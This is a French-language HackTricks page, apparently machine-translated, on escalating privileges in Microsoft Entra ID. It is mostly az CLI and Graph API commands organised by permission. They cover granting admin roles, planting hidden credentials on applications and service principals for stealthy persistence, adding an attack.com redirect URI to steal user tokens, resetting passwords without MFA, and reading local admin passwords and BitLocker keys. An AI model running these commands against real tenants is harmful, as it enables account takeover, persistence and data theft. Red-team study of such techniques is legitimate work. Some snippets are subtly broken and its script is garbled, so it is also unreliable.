Az - EntraID Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Consultez les subscription plans!

Rejoignez le 💬 Discord group ou le telegram group ou suivez-nous sur Twitter 🐦 @hacktricks_live.

Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.

Note

Note that not all the granular permissions built-in roles have in Entra ID are elegible to be used in custom roles.

Roles

Role: Privileged Role Administrator

Ce rôle contient les permissions granulaires nécessaires pour pouvoir assigner des rôles à des principals et pour donner plus de permissions aux rôles. Les deux actions pourraient être abusées pour escalader les privilèges.

Assign role to a user:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

Ajouter plus de permissions à un rôle :

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Applications

`microsoft.directory/applications/credentials/update`

Cela permet à un attaquant d’ajouter des credentials (passwords ou certificates) à des applications existantes. Si l’application a des permissions privilégiées, l’attaquant peut s’authentifier en tant que cette application et obtenir ces privilèges.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

`microsoft.directory/applications.myOrganization/credentials/update`

Cela permet les mêmes actions que applications/credentials/update, mais limité aux applications à annuaire unique.

az ad app credential reset --id <appId> --append

`microsoft.directory/applications/owners/update`

En s’ajoutant comme owner, un attaquant peut manipuler l’application, y compris les credentials et permissions.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

`microsoft.directory/applications/allProperties/update`

Un attaquant peut ajouter un redirect URI aux applications utilisées par les utilisateurs du tenant, puis leur partager des URLs de connexion qui utilisent le nouveau redirect URL afin de voler leurs tokens. Notez que si l’utilisateur était déjà connecté à l’application, l’authentification sera automatique sans que l’utilisateur ait besoin d’accepter quoi que ce soit.

Notez qu’il est également possible de modifier les permissions demandées par l’application afin d’obtenir plus de permissions, mais dans ce cas l’utilisateur devra accepter à nouveau l’invite demandant toutes les permissions.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Applications Privilege Escalation

Comme expliqué dans this post il était très courant de trouver des applications par défaut qui ont des API permissions de type Application qui leur sont assignées. Une API Permission (comme appelée dans la console Entra ID) de type Application signifie que l’application peut accéder à l’API et effectuer des actions sans contexte utilisateur (sans qu’un user se connecte à l’app), et sans avoir besoin de rôles Entra ID pour l’autoriser. Par conséquent, il est très courant de trouver des applications hautement privilégiées dans chaque tenant Entra ID.

Ensuite, si un attaquant dispose d’un quelconque permission/role qui lui permet de mettre à jour les credentials (secret o certificate) de l’application, l’attaquant peut générer un nouveau credential puis l’utiliser pour s’authentifier en tant qu’application, obtenant ainsi toutes les permissions que l’application possède.

Notez que le blog mentionné partage certaines API permissions d’applications Microsoft par défaut courantes, cependant quelque temps après ce rapport Microsoft a corrigé ce problème et il n’est désormais plus possible de se connecter en tant qu’applications Microsoft. Cependant, il est toujours possible de trouver des custom applications avec de hauts privilèges qui pourraient être abusées.

How to enumerate the API permissions of an application:

# Get "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]

## For the perms of type "Scope"
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv

## For the perms of type "Role"
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv

Trouver toutes les autorisations API des applications et marquer les API appartenant à Microsoft

```bash #!/usr/bin/env bash set -euo pipefail

Known Microsoft first-party owner organization IDs.

MICROSOFT_OWNER_ORG_IDS=( “f8cdef31-a31e-4b4a-93e4-5f571e91255a” “72f988bf-86f1-41af-91ab-2d7cd011db47” )

is_microsoft_owner() { local owner=“$1” local id for id in “${MICROSOFT_OWNER_ORG_IDS[@]}”; do if [ “$owner” = “$id” ]; then return 0 fi done return 1 }

get_permission_value() { local resource_app_id=“$1” local perm_type=“$2” local perm_id=“$3” local key value key=“${resource_app_id}|${perm_type}|${perm_id}”

value=“$(awk -F ‘\t’ -v k=”$key“ ‘$1==k {print $2; exit}’ “$tmp_perm_cache”)“ if [ -n “$value” ]; then printf ‘%s\n’ “$value” return 0 fi

if [ “$perm_type” = “Scope” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “oauth2PermissionScopes[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ elif [ “$perm_type” = “Role” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “appRoles[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ else value=“” fi

[ -n “$value” ] || value=“UNKNOWN” printf ‘%s\t%s\n’ “$key” “$value” >> “$tmp_perm_cache” printf ‘%s\n’ “$value” }

command -v az >/dev/null 2>&1 || { echo “az CLI not found” >&2; exit 1; } command -v jq >/dev/null 2>&1 || { echo “jq not found” >&2; exit 1; } az account show >/dev/null

apps_json=“$(az ad app list –all –query ‘[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]’ -o json)”

tmp_map=“$(mktemp)” tmp_ids=“$(mktemp)” tmp_perm_cache=“$(mktemp)” trap ‘rm -f “$tmp_map” “$tmp_ids” “$tmp_perm_cache”’ EXIT

Build unique resourceAppId values used by applications.

jq -r ‘.[][2][]?.resourceAppId’ <<<“$apps_json” | sort -u > “$tmp_ids”

Resolve resourceAppId -> owner organization + API display name.

while IFS= read -r rid; do [ -n “$rid” ] || continue sp_json=“$(az ad sp show –id “$rid” –query ‘{owner:appOwnerOrganizationId,name:displayName}’ -o json 2>/dev/null || true)“ owner=“$(jq -r ‘.owner // “UNKNOWN”’ <<<“$sp_json”)“ name=“$(jq -r ‘.name // “UNKNOWN”’ <<<“$sp_json”)“ printf ‘%s\t%s\t%s\n’ “$rid” “$owner” “$name” >> “$tmp_map” done < “$tmp_ids”

echo -e “appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions”

Print all app API permissions and mark if the target API is Microsoft-owned.

while IFS= read -r row; do app_name=“$(jq -r ‘.[0]’ <<<”$row“)“ app_id=“$(jq -r ‘.[1]’ <<<”$row“)“

while IFS= read -r rra; do resource_app_id=“$(jq -r ‘.resourceAppId’ <<<”$rra“)“ map_line=“$(awk -F ‘\t’ -v id=”$resource_app_id“ ‘$1==id {print; exit}’ “$tmp_map”)“ owner_org=“$(awk -F’\t’ ‘{print $2}’ <<<”$map_line“)“ resource_name=“$(awk -F’\t’ ‘{print $3}’ <<<”$map_line“)“

[ -n “$owner_org” ] || owner_org=“UNKNOWN” [ -n “$resource_name” ] || resource_name=“UNKNOWN”

if is_microsoft_owner “$owner_org”; then is_ms=“true” else is_ms=“false” fi

permissions_csv=“” while IFS= read -r access; do perm_type=“$(jq -r ‘.type’ <<<”$access“)“ perm_id=“$(jq -r ‘.id’ <<<”$access“)“ perm_value=“$(get_permission_value “$resource_app_id” “$perm_type” “$perm_id”)“ perm_label=“${perm_type}:${perm_value}” if [ -z “$permissions_csv” ]; then permissions_csv=“$perm_label” else permissions_csv=“${permissions_csv},${perm_label}” fi done < <(jq -c ‘.resourceAccess[]’ <<<“$rra”)

echo -e “${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}” done < <(jq -c ‘.[2][]’ <<<“$row”) done < <(jq -c ‘.[]’ <<<“$apps_json”)

</details>

## Service Principals

### `microsoft.directory/servicePrincipals/credentials/update`

Cela permet à un attacker d'ajouter des credentials à des service principals existants. Si le service principal a des privilèges élevés, l'attaquant peut assumer ces privilèges.
```bash
az ad sp credential reset --id <sp-id> --append

Caution

Le nouveau mot de passe généré n’apparaîtra pas dans la web console, donc cela peut être un moyen furtif de maintenir la persistence sur un service principal.
Depuis l’API, ils peuvent être trouvés avec : az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

Si vous obtenez l’erreur "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid.", c’est parce qu’il n’est pas possible de modifier la propriété passwordCredentials du SP et qu’il faut d’abord la déverrouiller. Pour cela, vous avez besoin d’une permission (microsoft.directory/applications/allProperties/update) qui permet d’exécuter :

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

`microsoft.directory/servicePrincipals/synchronizationCredentials/manage`

Cela permet à un attaquant d’ajouter des credentials aux service principals existants. Si le service principal dispose de privilèges élevés, l’attaquant peut assumer ces privilèges.

az ad sp credential reset --id <sp-id> --append

`microsoft.directory/servicePrincipals/owners/update`

Comme pour les applications, cette permission permet d’ajouter davantage de owners à un service principal. Posséder un service principal permet de contrôler ses credentials et ses permissions.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

Après avoir ajouté un nouvel owner, j’ai essayé de le supprimer mais l’API a répondu que la méthode DELETE n’était pas prise en charge, même si c’est la méthode qu’il faut utiliser pour supprimer l’owner. Donc, vous ne pouvez plus supprimer d’owners actuellement.

`microsoft.directory/servicePrincipals/disable` and `enable`

Ces permissions permettent de désactiver et d’activer des service principals. Un attaquant pourrait utiliser cette permission pour activer un service principal auquel il pourrait obtenir accès d’une manière ou d’une autre afin d’escalader ses privilèges.

Notez que pour cette technique, l’attaquant aura besoin de plus de permissions afin de prendre le contrôle du service principal activé.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

`microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`

Ces permissions permettent de créer et d’obtenir des credentials pour le single sign-on, ce qui pourrait permettre l’accès à des applications tierces.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Groups

`microsoft.directory/groups/allProperties/update`

Cette permission permet d’ajouter des utilisateurs à des groupes privilégiés, ce qui mène à une privilege escalation.

az ad group member add --group <GroupName> --member-id <UserId>

Note: Cette permission exclut les groupes assignables à un rôle Entra ID.

`microsoft.directory/groups/owners/update`

Cette permission permet de devenir propriétaire de groupes. Un propriétaire d’un groupe peut contrôler l’appartenance au groupe et les paramètres, ce qui peut potentiellement permettre une escalation de privilèges vers le groupe.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Note: Cette permission exclut les groupes assignables de rôle Entra ID.

`microsoft.directory/groups/members/update`

Cette permission permet d’ajouter des membres à un groupe. Un attaquant pourrait s’ajouter lui-même ou ajouter des comptes malveillants à des groupes privilégiés, ce qui peut accorder un accès élevé.

az ad group member add --group <GroupName> --member-id <UserId>

`microsoft.directory/groups/dynamicMembershipRule/update`

Cette permission permet de mettre à jour la règle d’appartenance dans un groupe dynamique. Un attaquant pourrait modifier les règles dynamiques pour s’inclure lui-même dans des groupes privilégiés sans ajout explicite.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Note: Cette permission exclut les groupes attribuables à un rôle Entra ID.

Dynamic Groups Privesc

Il pourrait être possible pour des utilisateurs d’escalader les privilèges en modifiant leurs propres propriétés pour être ajoutés comme membres de groupes dynamiques. Pour plus d’infos, voir :

Az - Dynamic Groups Privesc

Users

`microsoft.directory/users/password/update`

Cette permission permet de réinitialiser le mot de passe des utilisateurs non-admin, permettant à un attaquant potentiel d’escalader les privilèges vers d’autres utilisateurs. Cette permission ne peut pas être attribuée à des custom roles.

# Update user password
userId="<user-id>"
az ad user update --id $userId --password "kweoifuh.234"

# Update user password without needing to change or use MFA on next sign-in
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$userId" \
--headers "Content-Type=application/json" \
--body "{
\"passwordProfile\": {
\"forceChangePasswordNextSignInWithMfa\": false,
\"forceChangePasswordNextSignIn\": false,
\"password\": \"kweoifuh.234\"
}
}"

`microsoft.directory/users/basic/update`

Ce privilège permet de modifier les propriétés de l’utilisateur. Il est courant de trouver des dynamic groups qui ajoutent des utilisateurs en fonction des valeurs de propriétés, donc cette permission pourrait permettre à un utilisateur de définir la valeur de propriété nécessaire pour être membre d’un dynamic group spécifique et escalader les privilèges.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Conditional Access Policies & MFA bypass

Des politiques d’accès conditionnel mal configurées nécessitant MFA pourraient être contournées, voir :

Az - Conditional Access Policies & MFA Bypass

Devices

`microsoft.directory/devices/registeredOwners/update`

Cette permission permet aux attaquants de s’attribuer eux-mêmes comme propriétaires de devices afin de prendre le contrôle ou d’accéder à des paramètres et données spécifiques au device.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

`microsoft.directory/devices/registeredUsers/update`

Cette permission permet aux attaquants d’associer leur compte à des devices afin d’obtenir un accès ou de contourner des security policies.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

`microsoft.directory/deviceLocalCredentials/password/read`

Cette permission permet aux attackers de lire les propriétés des identifiants du compte administrateur local sauvegardé pour les devices Microsoft Entra joined, y compris le password

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

`microsoft.directory/bitlockerKeys/key/read`

Cette permission permet d’accéder aux clés BitLocker, ce qui pourrait permettre à un attaquant de déchiffrer des disques, compromettant la confidentialité des données.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Autres permissions intéressantes (TODO)

microsoft.directory/applications/permissions/update
microsoft.directory/servicePrincipals/permissions/update
microsoft.directory/applications.myOrganization/allProperties/update
microsoft.directory/applications/allProperties/update
microsoft.directory/servicePrincipals/appRoleAssignedTo/update
microsoft.directory/applications/appRoles/update
microsoft.directory/applications.myOrganization/permissions/update

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Consultez les subscription plans!

Rejoignez le 💬 Discord group ou le telegram group ou suivez-nous sur Twitter 🐦 @hacktricks_live.

Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.